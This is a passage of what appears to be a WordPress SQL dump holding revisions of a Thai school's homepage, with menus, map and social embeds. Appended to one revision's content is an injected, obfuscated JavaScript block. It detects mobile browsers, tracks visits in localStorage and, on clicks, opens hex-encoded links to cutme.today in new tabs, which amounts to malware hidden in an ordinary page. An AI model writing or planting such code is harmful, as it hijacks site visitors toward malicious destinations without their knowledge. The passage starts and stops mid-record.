class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:embed {\"url\":\"https://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\",\"type\":\"rich\",\"providerNameSlug\":\"canva\"} -->\n<figure class=\"wp-block-embed is-type-rich is-provider-canva wp-block-embed-canva\"><div class=\"wp-block-embed__wrapper\">\nhttps://www.canva.com/design/DAGsFHWqrOk/eCZISZCLZjZV8cpVDnNIUA/view\n</div></figure>\n<!-- /wp:embed --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-03 11:53:14','2025-07-03 04:53:14','',14,'http://pakhaeng.ssk.in.th/?p=1653',0,'revision','',0),
(1655,1,'2025-07-03 11:59:35','2025-07-03 04:59:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- 